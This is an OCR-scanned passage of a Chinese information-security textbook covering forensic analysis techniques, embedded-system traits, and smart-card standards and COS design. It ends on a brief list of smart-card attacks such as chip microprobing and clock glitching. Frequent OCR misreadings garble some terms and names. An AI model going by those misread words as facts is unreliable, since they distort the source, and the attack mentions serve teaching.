(4) 代码 或 数据 特征 等 : 软件 都 是 由 程序 员 所 编写 的 ， 软 件 代码 中 自然 也 会 融入 开 
发 者 的 部 分 编写 特征 或 个 人 习惯 。 壁 如 通过 对 恶意 代码 特征 或 程序 数据 特征 的 识别 ， 可 
能 有 利于 掌握 攻击 者 的 编写 水 平 、 缺 陷 、 甚 至 个 人 信息 ， 以 进一步 对 攻击 者 进行 渊源 
定位 。 

3. 密码 破译 

目前 ， 加 密 技术 被 广泛 采用 ， 加 密 手 段 和 工具 很 丰富 。 如 果 获 取 的 数据 或 文件 是 加 
密 存 储 的 ， 则 需要 进行 文件 解密 ， 这 时 可 能 需要 利用 到 对 应 的 解密 工具 ， 采 用 相应 的 解 
密 手 段 ， 以 对 电子 介质 中 的 被 保护 信息 进行 强行 访问 ， 获 取信 息 。 

4. 数据 恢复 与 残留 数据 分 析 

在 计算 机 系统 中 ， 为 了 提升 文件 系统 的 存储 和 处 理 速度 ， 格 式 化 和 文件 删除 操作 实 
际 上 并 未 真正 覆盖 删除 掉 原 始 数据 ， 这 时 将 对 应 扇 区 标注 为 空间 ， 可 被 新 文件 内 容 所 履 
盖 。 以 此 ， 即 便 是 被 格式 化 后 的 磁盘 ， 其 中 依然 存在 大 量 以 前 的 数据 。 因 此 ， 可 以 通过 
数据 恢复 技术 来 恢复 被 删除 的 数据 或 文件 ， 或 者 通过 相关 技术 对 残留 数据 进行 简单 或 关 
联 分 析 ， 以 获取 案件 相关 线索 。 

5. 磁盘 备份 文件 、 镜 像 文件 、 交 换文 件 、 临 时 文件 分 析 技术 

软件 或 计算 机 系统 在 运行 过 程 中 ， 可 能 会 产生 部 分 备份 文件 (如 .tmp)、 临 时 文件 
(如 .tmp)、 交 换文 件 或 空间 等 ， 或 是 针对 磁盘 重要 区 域 生成 部 分 镜像 文件 。 这 时 需要 根 
据 这 些 文件 结构 特征 ， 采 用 相关 工具 或 者 手段 来 提取 分 析 其 中 存放 的 重要 信息 (如 备份 
数据 、 软 件 运行 状态 和 结果 ， 磁 盘 的 使 用 情况 等 )。 

6. 日 志 记 录 文 件 分 析 

很 多 网 络 设备 、 系 统 软件 和 应 用 软件 对 已 操作 过 的 文件 或 行为 进行 了 相应 的 历史 记 
录 ， 形 成 了 部 分 操作 日 志 数 据 或 文件 ， 及 时 提取 和 分 析 这 部 分 文件 或 数据 ， 非 常 有 利于 
重 构 案件 的 部 分 场景 。 如 浏览 器 在 网 页 浏览 时 会 在 系统 中 多 个 位 置 保存 大 量 访问 记录 (如 
历史 URL itk, cookie, EX), W IS 日 志 会 对 用 户 的 各 类 访问 请 求 进行 详细 记 
录 ， 安 全 软件 存 有 报警 日 志 等 。 

7. 相关 性 分 析 等 

在 计算 机 上 的 很 多 操作 行为 是 由 用 户 所 发 起 ， 计 算 机 系统 则 生成 部 分 文件 或 者 各 种 
操作 痕迹 。 但 系统 中 留 下 来 的 文件 或 者 痕迹 往往 是 零散 的 ， 一 个 计算 机 相关 案件 往往 由 
多 个 部 分 所 组 成 ， 这 时 需要 对 电子 证 据 进行 相关 性 分 析 ， 以 对 各 类 电子 证 据 进行 关联 分 
析 ， 通 过 这 些 文件 和 痕迹 来 反 推 或 重 现 用 户 的 操作 行为 ， 以 寻找 事实 真相 或 进一步 锁定 
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嵌入 式 系统 是 计算 机 的 一 种 形式 ， 通 常 指 埋藏 在 宿主 设备 中 的 微 处 理 机 系统 ， 亦 称 
为 埋藏 式 计算 机 。 典 型 机 种 包括 微 控 制 器 、 微 处 理 器 等 。 嵌 入 式 处 理 器 使 宿主 设备 功能 
智能 化 、 设 计 灵 活 和 操作 简单 ， 具 有 功能 强 、 实 时 性 强 、 结 构 紧 次、 可 靠 性 高 和 面向 对 
象 等 共同 特点 。 广 义 而 言 ， 嵌 入 式 系统 是 指 作为 某 种 技术 过 程 的 一 种 核心 处 理 环节 ， 即 
直接 与 现实 环境 接口 或 交互 的 信息 处 理 系统 。 

嵌入 式 计算 机 在 应 用 数量 上 远 远 超过 了 各 种 通用 计算 机 ， 一 台 通 用 计算 机 的 外 部 设 
备 中 就 包含 了 若干 个 嵌入 式微 处 理 器 ， 如 键盘 、 鼠 标 、 软 驱 、 硬 盘 、 显 示 卡 、 显 示 器 、 
网 卡 、 声 卡 、 打 印 机 、 扫 描 仪 、 数 字 相 机 等 均 是 由 嵌入 式 处 理 器 控制 的 。 制 造 工业 、 过 
程控 制 、 通 信 、 仪 器 、 仪 表 、 汽 车 、 船 舶 、 航 空 、 航 天 、 军 事 装 备 、 消 费 类 产品 等 均 是 
嵌入 式 计算 机 的 应 用 领域 ， 如 可 视 电 话 、 游 戏 机 、 电 话 手 机 、AHB (电视 机 顶 盒 )、 播 
放 机 、 电 子 阅 读 机 。 信 息 设备 的 出 现 标 志 着 革命 性 的 一 代 嵌 入 式 系统 已 经 诞生 。 

广义 地 讲 ， 凡 是 不 用 于 通用 目的 的 可 编程 计算 机 设备 ， 就 可 以 算是 榜 入 式 计算 机 系 
统 。 举 例 来 说 , 个 人 计算 机 (PC) 不 是 一 种 嵌入 式 系统 ,因为 它 是 用 于 通用 目的 的 系统 。 
而 一 些 电 话 系统 就 是 采用 个 人 计算 机 技术 建立 的 嵌入 式 计算 机 系统 ， 最 典型 的 嵌入 式 系 
统 如 手机 、 可 视 电话 等 ， 另 外 还 有 一 些 嵌 入 式 系统 采用 特殊 的 微 处 理 器 ， 如 传真 机 、 打 
印 机 等 。 

狭义 上 而 言 , 嵌入 式 系统 是 指 以 应 用 为 核心 ， 以 计算 机 技术 为 基础 ， 软 硬件 可 裁剪， 
适 于 应 用 系统 对 功能 、 可 靠 性 、 成 本 、 体 积 和 功 耗 严格 要 求 的 专用 计算 机 系统 。 

嵌入 式 系统 具有 如 下 的 特点 : 

(1) 嵌入 式 系统 具有 应 用 针对 性 。 

这 是 嵌入 式 系统 的 一 个 基本 特征 ， 体 现 这 种 应 用 针对 性 的 首先 是 软件 ， 软 件 实现 特 
定 应 用 所 需要 的 功能 , 所 以 嵌入 式 系统 应 用 中 必定 配置 了 专用 的 应 用 程序 ; 其 次 是 硬件 ， 
大 多 数 嵌 入 式 系统 的 硬件 是 针对 应 用 专门 设计 的 ,但 也 有 一 些 标准 化 的 嵌入 式 硬件 模块 ， 
采用 标准 模块 降低 开发 的 技术 难度 和 风险 ， 缩 短 开发 时 间 ， 但 灵活 性 不 足 。 

(2) 嵌入 式 系统 硬件 一 般 对 扩展 能 力 要 求 不 高 。 

硬件 上 ， 作 为 一 种 专用 的 计算 机 系统 ， 功 能 、 机 械 结 构 、 安 装 要 求 比较 固定 ， 所 以 
嵌入 式 系统 一 般 没有 或 仅 有 较 少 的 扩展 能 力 ;， 软件 上 ， 嵌 入 式 系统 往往 是 一 个 设备 固定 
组 成 部 分 ， 其 软件 功能 由 设备 的 需求 决定 ， 在 相对 较 长 的 生命 周期 里 ， 一 般 不 需要 对 软 
件 进 行 改动 。 但 也 有 一 些 特例 ， 比 如 现在 的 手机 ， 尤 其 是 安装 有 嵌入 式 操 作 系统 的 智能 
手机 ， 软 件 安装 、 升 级 比较 灵活 ， 但 相对 桌面 计算 机 其 软件 扩展 能 力 还 是 相当 弱 。 

(3) 嵌入 式 系统 一 般 采用 专门 针对 嵌入 式 应 用 设计 的 中 央 处 理 器 。 
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这 与 嵌入 式 系统 应 用 针对 性 有 关 , 相对 通用 计算 机 处 理 器 , 嵌入 式 处 理 器 种 类 繁多 ， 
不 同 的 嵌入 式 处 理 器 功能 /性 能 差异 非常 大 ， 主 频 从 几 兆 赫兹 到 干 兆 赫兹 、 引 脚 数量 从 几 
个 到 几 百 个 ， 只 有 这 种 多 样 化 才能 适应 千差万别 的 嵌入 式 系统 应 用 。 

(4) 嵌入 式 系统 中 操作 系统 可 能 有 也 可 能 没有 ， 且 嵌入 式 操作 系统 与 桌面 计算 机 操 
作 系 统 有 较 大 差别 。 

在 现代 的 通用 计算 机 中 ， 没 有 操作 系统 是 无 法 想象 的 ， 而 在 嵌入 式 计 算 机 中 情况 则 
大 不 相同 。 在 一 个 功能 简单 的 嵌入 式 系统 中 ， 可 能 根本 不 需要 操作 系统 ， 直 接 在 硬件 平 
台 上 运行 应 用 程序 ;而 一 些 功 能 复杂 的 嵌入 式 系统 ， 可 能 需要 支持 有 线 /无 线 网 络 、 文 件 
系统 、 实 现 灵 活 的 多 媒体 功能 、 支 持 实时 多 任务 处 理 ， 此 时 ， 在 硬件 平台 和 应 用 软件 之 
间 增加 一 个 操作 系统 层 ， 可 使 应 用 软件 的 设计 变 得 简单 ， 而 且 便 于 实现 更 高 的 可 靠 性 ， 
缩短 系统 开发 时 间 ， 使 系统 的 研发 工作 变 得 可 控 。 目 前 存在 很 多 种 嵌入 式 操作 系统 ， 如 
VxWorks, pSOS, fi Azt Linux, WinCE 等 ， 这 些 操作 系统 功能 日 益 完善 ， 以 前 只 在 桌 
面 通用 操作 系统 具备 的 功能 ， 如 网 络 浏览 器 、HTTP 服务 器 、Word 文档 阅读 与 编辑 等 ， 
也 可 以 在 嵌入 式 系统 中 实现 。 但 为 适应 撕 入 式 系统 的 需要 ， 嵌 入 式 操作 系统 相对 通用 操 
作 系 统 ， 具 有 模块 化 、 结 构 精练 、 定 制 能 力 强 、 可 靠 性 高 、 实 时 性 好 、 便 于 写 入 非 易 失 
性 存储 器 〈 固 化 ) 等 特点 。 

(5) 典 入 式 系统 一 般 有 实时 性 要 求 。 

设备 中 的 嵌入 式 系统 常用 于 实现 数据 采集 、 信 息 处 理 、 实 时 控制 等 功能 ， 而 采集 、 
处 理 、 控 制 往往 是 一 个 连续 的 过 程 。 一 个 过 程 要 求 必须 在 一 定 长 的 时 间 内 完成 ， 这 就 是 
系统 实时 性 的 要 求 。 实 时 性 和 处 理 器 速度 不 是 一 回 事 ， 速 度 快 的 系统 不 一 定 实 时 性 好 ， 
速度 慢 的 系统 实时 性 未 必 不 能 满足 要 求 。 计算 机 运行 速度 高 ,当然 更 有 条 件 实现 实时 性 ， 
但 不 是 实时 性 的 充 要 条 件 。 雹 入 式 系统 的 设计 要 求 精练 ， 因 此 在 运算 速度 上 不 会 留 太 多 
余 量 ， 为 了 保证 实时 性 要 求 ， 更 需要 对 硬件 、 软 件 精 心 设计 。 

(6) 嵌入 式 系统 一 般 有 较 高 的 成 本 控制 要 求 。 

在 满足 需求 的 前 提 下 ， 在 嵌入 式 系统 开发 中 ， 要 求 高 效率 地 设计 ， 减 少 硬件 、 软 件 
宛 余 ， 恰 到 好 处 的 设计 可 以 最 大 限度 地 降低 系统 成 本 ， 并 有 利于 提高 系统 的 可 靠 性 。 强 
大 的 硬件 平台 才能 满足 日 益 复杂 的 桌面 操作 系统 及 各 种 类 型 软件 的 需要 ， 这 样 的 计算 机 
“通用 性 ” 才 最 强 。 

(7) 嵌入 式 系统 软件 一 般 有 固化 的 要 求 。 

在 现代 的 通用 计算 机 中 ， 硬 盘 是 操作 系统 和 应 用 软件 的 载体 ， 对 于 这 些 几 “GB”， 
甚至 儿 十 “GB”、 儿 百 “GB” 的 软件 及 数据 ,硬盘 是 最 好 的 记录 媒介 。 嵌 入 式 系统 软件 
一 般 把 操作 系统 和 应 用 软件 直接 固化 在 非 易 失 性 存储 器 (如 FLASH 存储 器 ) 中。 首先 ， 
嵌入 式 系统 一 般 没有 硬盘 ， 就 算 有 硬盘 或 存储 卡 之 类 的 外 部 存储 器 ， 也 很 少 用 于 存储 系 
统 软 件 ， 多 是 用 于 存储 数据 或 用 户 扩展 的 软件 ， 其 次 ， 无 论 是 操作 系统 还 是 应 用 软件 都 
很 精练 ， 所 占 容量 相对 通用 计算 机 要 小 得 多 ， 所 以 有 固化 的 条 件 ， 再次， 嵌入 式 系 统 不 
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像 通用 计算 机 那么 容易 安装 和 升级 软件 ， 而 且 也 很 少 需要 改动 ， 所 以 要 求 软件 存储 可 靠 
性 高 ， 因 此 有 必要 把 软件 固化 ， 最后， 软件 固化 有 利于 提高 嵌入 式 系统 的 启动 速度 。 

(8) 嵌入 式 系统 软件 一 般 采 用 交叉 开发 的 模式 。 

目前 软件 设计 工作 大 多 采用 集成 开发 环境 ， 将 代码 编辑 、 编 译 、 链 接 、 仿 真 、 调 试 
等 软件 开发 工具 集成 在 一 起 。 和 嵌入 式 系统 针对 具体 的 应 用 进行 设计 ， 其 硬件 、 软 件 的 配 
置 往往 不 便于 或 不 可 能 支持 应 用 软件 开发 。 实 际 开发 中 ,一 般 用 通用 计算 机 (主要 是 PC 
BL) 作为 开发 机 ， 进 行 戏 入 式 软件 的 编辑 、 编 译 、 链 接 ， 在 开发 机 上 进行 仿真 ， 或 下 载 
到 嵌入 式 目标 系统 是 运行 测试 ， 最 终 的 目标 代码 固化 到 目的 系统 的 存储 器 中 运行 ， 这 就 
是 所 谓 交 叉 开 发 的 软件 设计 模式 。 

(9) 嵌入 式 系统 在 体积 、 功 耗 、 可 靠 性 、 环 境 适 应 性 上 一 般 有 特殊 要 求 。 

嵌入 式 系统 作为 一 个 固定 的 组 成 部 分 “嵌入 ”在 设备 中 ， 因 受 装 配 、 供 电 、 散 热 等 
条 件 的 约束 ， 其 体积 、 功 耗 必然 有 一 定 的 限制 。 例 如 ， 现 在 的 手机 功能 日 益 强 大 ， 但 体 
积 越 做 越 小 ， 集 成 度 和 装配 密度 非常 高 ， 在 这 种 应 用 环境 里 ， 嵌 入 式 计算 机 部 分 的 芯片 
封装 、 电 路 板 设计 、 系 统 装配 等 都 要 求 紧凑 、 小 巧 。 在 功 耗 方面 也 有 严格 的 要 求 ， 一 方 
面 密封 在 手机 里 ， 没有 良好 的 散热 条 件 , 功 耗 控 制 不 好 会 导致 手机 温度 过 高 ; 另 一 方面 ， 
电路 的 功 耗 直接 决定 了 手机 一 次 充电 后 持续 工作 的 时 间 。 嵌 入 式 系统 作为 设备 的 核心 ， 
其 可 靠 性 直接 决定 了 设备 可 靠 性 ， 因 此 在 这 方面 有 严格 的 要 求 。 尤 其 在 航空 、 航 天 、 武 
器 装备 等 应 用 中 ， 购 入 式 系统 的 可 靠 性 更 是 生死 依 关 的 事情 。 

(10) 嵌入 式 系统 技术 标准 化 程度 不 高 。 

PC 是 最 普及 的 通用 计算 机 ， 其 主板 结构 、 计 算 机 扩展 总 线 、 扩 展板 结构 、 内 存 扩 
展 、 电 源 、 机 箱 、 外 部 设备 接口 ， 甚 至 安装 螺钉 等 都 完全 标准 化 ， 所 以 PC 机 完全 以 社 
会 化 分 工 的 形式 进行 批量 大 规模 生产 。PC 的 标准 化 不 仅 体现 在 硬件 上 , 软件 上 也 有 很 高 
的 标准 化 趋势 ， 如 数据 库 标 准 、 操 作 系统 标准 、 文 本 标准 等 等 。 每 个 嵌入 式 系统 都 是 针 
对 具体 应 用 设计 ， 所 以 千差万别 ， 不 可 能 像 PC 一 样 制定 高 度 一 致 的 标准 ， 也 正 是 因为 
这 个 原因 ， 在 嵌入 式 领域 才 不 会 形成 个 别 企 业 垄 断 市 场 的 现象 。 

标准 化 有 利于 社会 化 的 分 工 合作 ， 媒 入 式 领域 也 存在 一 定 程度 的 标准 化 ， 如 PC104 
总 线 标准 、Compact PCI 总 线 标准 等 ， 只 是 这 些 标准 的 应 用 相对 于 整个 嵌入 式 领 域 还 是 
很 小 的 一 部 分 。 嵌 入 式 系统 与 通用 计算 机 系统 技术 上 是 相通 的 ， 通 用 计算 机 发 展 快 、 性 
强 ， 很 多 技术 可 以 应 用 到 嵌入 式 系统 中 ， 在 应 用 中 ， 还 经 常 可 见 经 过 机 械 结构 、 环 境 
适应 性 改造 的 通用 计算 机 应 用 在 嵌入 式 领 域 中 。 

常用 的 嵌入 式 系统 设备 ， 包 括 智 能 卡 、USB-key 和 智能 手机 等 。 


4.6.1 智能 卡 概论 


在 大 多 数 工 业 化 国家 中 ， 信 用 卡 已 经 成 为 生活 中 必 不 可 少 的 一 部 分 : 信用 卡 可 以 用 
于 鉴别 身份 、 旅 游 、 进 入 建筑 物 、 从 银行 提 款 、 商 品 买卖 和 服务 付费 等 。 我 们 经 常 可 以 
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得 到 一 些 新 卡 。 许 多 人 热衷 于 收集 各 种 各 样 的 卡 。 一 些 人 已 经 开始 感觉 到 他 们 的 生活 离 
不 开 各 种 各 样 的 卡 了 。 

目前 的 很 多 应 用 ， 比 如 健康 卡 、 几 账 记录 和 便携 数据 收集 ， 都 需要 能 够 比 磁 条 产 储 
存 更 多 数据 的 卡 。 但 是 运用 带 有 芯片 的 卡 的 真正 原因 更 多 的 是 安全 : 内 部 拥有 集成 电路 
的 智能 卡 具 有 的 许多 特性 ， 使 得 这 些 卡 不 仅 可 以 安全 地 存储 数据 ， 而 且 还 可 以 确保 数据 
在 其 他 计算 机 系统 中 的 安全 储存 。 智 能 卡 (Smartcard 或 IC Card) 就 是 拥有 该 项 功能 的 
卡 的 总 称 。 
4.6.1.1 智能 卡 的 定义 和 分 类 

智能 卡 又 称 智慧 卡 、 聪 明 卡 、 集 成 电路 卡 ， 都 指 粘贴 或 嵌 有 集成 电路 芯片 的 一 种 便 
携 式 卡 片 塑胶 。 卡 片 包含 了 微 处 理 器 、L/O 接口 及 内 存 ， 提 供 了 资料 的 运算 、 存 取 控 制 
及 储存 功能 ， 卡 片 的 大 小 、 接 点 定义 目前 是 由 ISO7816 规范 统一 。 常 见 的 有 电话 IC 卡 、 
身份 IC 卡 , 以 及 一 些 交 通票 证 和 存储 卡 。 从 功能 上 来 说 , 智能 卡 的 用 途 可 归 为 如 下 四 点 : 
1. 身份 识别 ，2. 支付 工具 ，3. 加 密 / 解 密 ，4. 信息 存储 。 

第 一 个 符合 ISO 标准 的 集成 电路 芯片 卡片 是 法 国人 Ro-land morono 于 1974 年 发 明 
的 。 法 国 布尔 (BULL) 公司 于 1976 年 首先 制 成 IC 卡 产 品 ， 并 开始 应 用 在 各 个 领域 。 

智能 卡 的 组 成 分 为 3 部 分 ， 基 片 和 接触 面 和 内 部 的 集成 芯片 。 

(1) 基 片 : 现在 多 为 PVC 材质 ， 也 有 塑料 或 是 纸 制 的 。 

(2) 接触 面 : 金属 材质 ， 一 般 为 铜 制 薄片 ， 集 成 电路 的 输入 输出 端 连结 到 大 的 接触 
面 上 ， 这 样 便于 读 写 器 的 操作 ， 大 的 接触 面 也 有 助 于 延长 卡片 使 用 寿命 ， 触 点 一 般 有 8 
个 (C1 C2 C3 C4 C5 C6 C7 C8，C4 和 C8 设计 为 将 来 保留 用 )， 但 由 于 历史 原因 有 的 智 
能 卡 设计 成 6 个 触 点 (Cl C2 C3 C5 C6 C7)。 另 外 ，C6 原来 设计 为 对 EEPROM 供电 ， 
但 因 后 来 EEPROM 所 需 的 编程 电压 (Programming Voltage) 由 芯片 内 直接 控制 ， 所 以 C6 通 
常 也 就 不 再 使 用 了 。 目 前 ， 也 有 很 多 IC 卡 内 部 集成 天 线 ， 采 用 非 接触 的 形式 进行 信息 的 
传递 。 

(3) 集成 芯片 : 通常 非常 薄 ， 在 0.5mm 以 内 ， 直 径 大 约 1/4cm， 一 般 成 圆 形 ， 方 形 
的 也 有 ， 内 部 芯片 一 般 有 CPU, RAM, ROM, EPROM. 

智能 卡 的 分 类 方式 很 多 ， 可 以 按照 下 列 的 方式 进行 : 

CL) 依 电源 分 类 : 

。 主动 卡 (Active card): 内 含 供电 装置 (电池 )， 甚 至 有 屏幕 、 键 盘 。 

e 被 动 卡 (Passive card): 由 外 部 提供 电源 。 

(2) 依 资 料 传输 方式 分 类 : 

o 接触 式 (Contact card) 读 写 需要 IO 线路 接触 。 

o 非 接触 式 〈Contact less card) 使 用 RF、 红 外线 、 感 应 电动 势 、 非 IO 线路 接触 ， 

( 非 接触 技术 类 似 REID 技术 )。 
e 混合 式 (Hybrid-card 或 Combi-card) 同时 拥有 接触 与 非 接触 接口 。 


Ev 


KA. 


信息 安全 工程 师 教程 


(3) 根据 卡 中 所 灸 庶 的 集成 电路 的 不 同 可 以 分 成 以 下 三 类 : 

。 存储 器 卡 : 卡 中 的 集成 电路 为 EEPROM (可 用 电 擦 除 的 可 编程 只 读 存储 器 )。 

。 逻辑 加 密 卡 ， 卡 中 的 集成 电路 具有 加 密 逻 辑 和 EEPROM。 

© CPU 卡 : 卡 中 的 集成 电路 包括 中 央 处 理 器 CPU、EEPROM、 随 机 存储 器 RAM 以 

及 固化 在 只 读 存储 器 ROM 中 的 片 内 操作 系统 COS (chip operation system). 

(4) 按 应 用 领域 来 分 ， 可 分 为 金融 卡 和 非 金 融 卡 两 种 ; 

金融 卡 又 有 信用 卡 〈credit card) 和 现金 卡 〈debit card) 等 。 信 用 卡 主要 由 银行 发 行 
印 管理 ， 持 卡 人 用 它 作 为 消费 时 的 支付 工具 ， 可 以 使 用 预先 设 定 的 信用 限额 资金 。 现 金 
卡 又 称 储蓄 卡 ， 可 用 作 电 子 存折 和 电子 钱包 、 不 允许 透支 。 

非 金融 卡 往往 出 现在 各 种 事务 管理 、 安 全 管理 场所 ， 如 身份 证 明 、 健 康 记 录 和 职工 
考勤 等 。 另 外 一 些 预付 费 卡 ， 例 如 用 于 公文 系统 中 的 交通 卡 和 电表 上 的 IC 卡 等 ,由 相应 
的 管理 单位 发 行 〈 当 然 也 可 委托 银行 收费 )。 这 种 卡 兼 有 一 部 分 电子 钱包 的 功能 。 

不 管 对 智能 卡 的 如 何 分 类 ， 目 前 对 于 应 用 于 PKI 应 用 的 智能 卡 ， 都 带 有 硬件 真 随 机 
数 发 生 器 、RSA 协 处 理 器 ， 可 以 硬件 实现 RSA 的 运算 。 另 外 ,还 具有 DES 和 SHA-1 等 
密码 算法 ， 保 证 在 硬件 内 部 产生 密 钥 对 ， 并 在 硬件 内 部 完成 加 、 解 密 运 算 。 智 能 卡 本 身 ， 
已 经 是 一 个 小 型 的 嵌入 式 平台 了 。 
4.6.1.2 ”相关 标准 

智能 卡 目前 主要 的 功能 在 于 身份 辨识 和 点 数 计算 ， 其 主要 机 理 是 运用 内 含 微 电脑 系 
统 对 资料 进行 数学 运算 ， 确 认 其 唯一 性 或 者 利用 内 建 计数 器 (counter) 替代 成 货币 、 红 
利 点 数 等 数字 型 的 资料 。 

卡片 内 部 运作 除了 硬件 之 外 还 有 其 软件 ， 通 常会 需要 一 个 核心 COS (Card Operating 
System) 提供 服务 , 其 内 部 软件 系统 架构 如 下 : 硬件 (Hardware) 一 COS 一 AP (Application). 

有 些 COS 可 以 提供 Java 语言 的 服务 ， 产 生 一 个 分 支 称 为 Java Card. Visa 国际 组 织 
因此 利用 Java 语言 ， 发 展 出 Visa OpenPlatform 之 卡片 ， 后 来 则 改称 为 Global Platform。 
MasterCard 国际 组 织 则 支持 另 一 个 MULTOS (MULTti Operating System) 平台 。 不 管 是 
Global Platform 或 是 MULTOS， 应 用 服务 提供 者 可 以 随时 在 此 两 者 平台 上 开发 新 的 应 用 
程式 单元 (Applet) 去 执行 特定 的 功能 ， 不 必 再 经 过 Mask 开发 之 过 程 ， 大 大 减少 了 开发 
的 费用 与 时 间 。 

目前 IC 可 提供 厂商 主要 有 : NXP Semiconductor, ATMEL, MicroChip, Infeneon, 
STMicroelectronics, Samsung Electronics 等 ， 国 内 的 厂家 也 正在 进行 相关 自主 品牌 的 研 
发 工作 。 

智能 卡 目前 使 用 的 国际 标准 主要 有 如 下 2 种 : 

© ISO7816 (接触 式 智能 卡 ， 规 定 了 规格 /电气 特性 /通信 协议 /部 件 等 各 方面 ); 

。 ISO 14443 〈 非 接触 式 智能 卡 )。 

这 套 协 议 不 仅 规定 了 IC 卡 的 机 械 电 气 特性 ， 而 且 还 规定 了 IC 卡 〈 特 别 是 智能 卡 ) 
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的 应 用 方法 (包括 COS 中 很 多 数据 结构 )。 

除了 7816 协议 之 外 ,在 各 个 可 能 应 用 IC 卡 的 特定 领域 内 还 有 一 些 更 为 具体 的 协议 ， 
比如 在 中 国 ， 金 融 领 域 制定 PBOC 规范 ， 交 通 管理 体系 ， 社 会 福利 体系 都 有 其 特定 的 规 
范 。 这 些 协 议 规范 都 是 建立 在 7816 协议 基础 之 上 ， 且 将 7816 协议 加 以 具体 化 形成 的 。 
当然 ，7816 协议 并 不 是 独立 存在 〈 定 义 ) 的 ， 它 里 面 有 很 多 概念 引 自 于 其 他 一 些 相 
关 的 协议 规范 。 比 如 在 7816 协议 中 有 一 些 数据 的 组 织 采 用 了 “BER-TLV”， 而 有 关 
“BER-TLV” 这 个 概念 的 详细 表述 则 是 在 TEC 8825 ASN.1 协议 中 给 出 。 由 此 可 见 7816 
协议 并 非 完 全 独 出 心 裁 ， 能 够 采用 规范 的 概念 的 场合 就 不 自作 主张 。 这 使 得 各 种 协议 规 
范 形成 一 个 严密 的 体系 。 
4.6.1.3 ”智能 卡 的 COS 

从 本 质 上 说 ， 片 内 操作 系统 (COS) 是 智能 卡 芯片 内 的 一 个 监控 软件 ， 它 在 智能 卡 
中 的 概念 和 地 位 类 似 于 DOS 在 个 人 计算 机 PC 中 的 概念 和 地 位 : 替 用 户 管理 片 内 各 种 文 
件 和 硬件 资源 ， 接 受 外 界 〈 读 写 器 ) 命令 , 通过 它 的 命令 解释 程序 完成 命令 规定 之 操作 ， 
并 给 出 回答 的 信息 。 

与 DOS 不 一 样 的 地 方 在 于 : COS 更 加 注意 安全 ， 有 自己 完整 的 安全 体系 。COS 是 
专用 的 监控 程序 ,而 非 通 用 的 操作 系统 , 即 COS 是 针对 特定 的 某 种 智能 卡 及 应 用 需求 而 
设计 开发 。 不 同 卡 的 COS 一 般 不 同 ， 尽 管 它们 在 功能 实施 上 可 能 遵循 同一 国际 标准 。 

COS 一 般 由 四 部 分 组 成 : 通讯 管理 模块 和 安全 管理 模块 、 应 用 管理 模块 和 文件 管理 
模块 ， 如 图 4-15 所 示 。 


图 4-15 智能 卡 COS 的 构成 


1. 通信 管理 模块 
该 模块 是 COS 与 外 界 的 半 双 工 通信 通道 ， 其 按照 ISO7816 国际 标准 的 T=0 或 T=1 
异步 通讯 协议 ， 接 受 读 写 器 命令 ， 并 对 接收 信息 采取 奇偶 校 验 、 累 加 和 及 分 组 长 度 检验 
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等 手段 进行 正确 性 判断 。 若 有 错误 ， 则 按 协 议 规定 对 命令 附加 标记 或 请 求 重 发 : 若 无 误 ， 
则 滤 除 起 始终 止 位 等 附加 信息 后 ， 将 命令 送 安全 管理 模块 。 

此 外 ， 它 还 需 按照 协议 格式 ， 输 出 对 命令 的 “应 答 ” 为 每 个 传输 单位 增加 各 种 必 
要 的 附加 信息 。 

2. 安全 管理 模块 

这 是 COS 的 极 重要 组 成 部 分 。 智能 卡 之 所 以 能 够 迅速 发 展 、 广 泛 应 用 的 一 个 重要 原 
因 ， 就 在 于 该 模块 也 即 COS 的 安全 体系 所 提供 的 高 安全 性 保证 。COS 安全 体系 有 三 个 
基本 概念 : 

© 安全 状态 : 智能 卡 在 完成 复位 应 答 或 其 他 命令 后 的 当前 所 处 状态 ， 通 常用 智能 
卡 当 前 已 满足 条 件 的 集合 来 表示 。 

@ 安全 属性 : 允许 执行 某 命令 或 访问 某 文件 所 必须 满足 的 条 件 。 

@ 安全 机 制 : 智能 卡 安全 运行 的 手段 、 途 径 或 方法 ， 包 括 PIN 鉴别 、 卡 与 读 写 器 
间 的 相互 认证 、 数 据 完 整 性 验证 和 加 密 等 。 

安全 体系 设计 所 考虑 的 三 个 重要 问题 就 是 : 安全 状态 的 确认 、 安 全 局 性 的 设置 和 安 
全 机 制 的 实现 ， 且 尤 以 后 者 为 重 。 

安全 机 制 可 按 对 象 划分 为 针对 动态 信息 的 安全 性 传输 控制 和 针对 卡 内 静态 信息 的 
内 部 安全 控制 管理 两 部 分 。 

3. 应 用 管理 模块 

应 用 管理 模块 的 主要 任务 是 对 接收 命令 进行 可 执行 性 判断 ， 而 智能 卡 的 所 有 应 用 都 
是 以 文件 形式 存在 ， 应 用 管理 的 内 涵 已 表现 为 对 文件 访问 权限 的 安全 控制 ， 因 此 它 常常 
融 于 安全 管理 和 文件 管理 之 中 ， 而 非 一 独立 模块 。 

4. 文件 管理 模块 

所 谓 文 件 ， 是 指 卡 中 数据 单元 或 记录 的 有 组 织 的 集合 。COS 通过 给 每 种 应 用 建立 对 
应 文件 的 办 法 ， 实 现 它 对 各 项 应 用 的 存储 及 管理 。 这 些 文件 是 在 卡 的 个 人 化 过 程 中 由 发 
行商 根据 对 卡 的 应 用 需求 而 创建 ， 用 户 通常 不 能 创建 或 删除 文件 ， 但 可 酌情 修改 文件 内 
容 ， 对 文件 的 记录 和 数据 单元 进行 增加 或 删除 。 
4.6.1.4 智能 卡 的 安全 问题 

从 智能 卡 硬 件 的 安全 特性 看 ， 在 芯片 设计 制造 中 考虑 了 多 种 安全 措施 ， 如 防止 他 人 
修改 数据 等 ;在 芯片 的 操作 系统 (COS) 的 设计 上 、 在 智能 卡 数据 通信 上 都 采取 了 各 种 
不 同 的 安全 措施 。 以 上 的 安全 措施 中 ， 都 采用 了 强度 极 高 的 各 种 安全 算法 、 数 据 加 密 等 
措施 。 在 应 用 当中 采用 了 包括 生物 识别 在 内 的 用 户 身 份 识别 、 用 户 PIN 码 认 证 、 智 能 卡 
与 智能 卡 读 写 机 间 的 交互 认证 等 各 种 安全 措施 。 

任何 涉及 到 安全 的 产品 都 有 被 攻击 的 可 能 ， 智 能 卡 也 不 例外 ， 针 对 智能 卡 ， 有 以 下 
儿 种 常见 的 攻击 手段 : 

O 物理 自 改 : 想 办 法 使 卡 中 的 集成 电路 暴露 出 来 ， 用 微 探 针 附 在 芯片 表面 ， 直 接 
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读 出 存储 器 中 的 内 容 。 

© 时 钟 拌 动 : 让 时 钟 工作 在 正常 的 频率 范围 ， 但 是 在 某 一 精确 计算 的 时 间 间 隔 内 
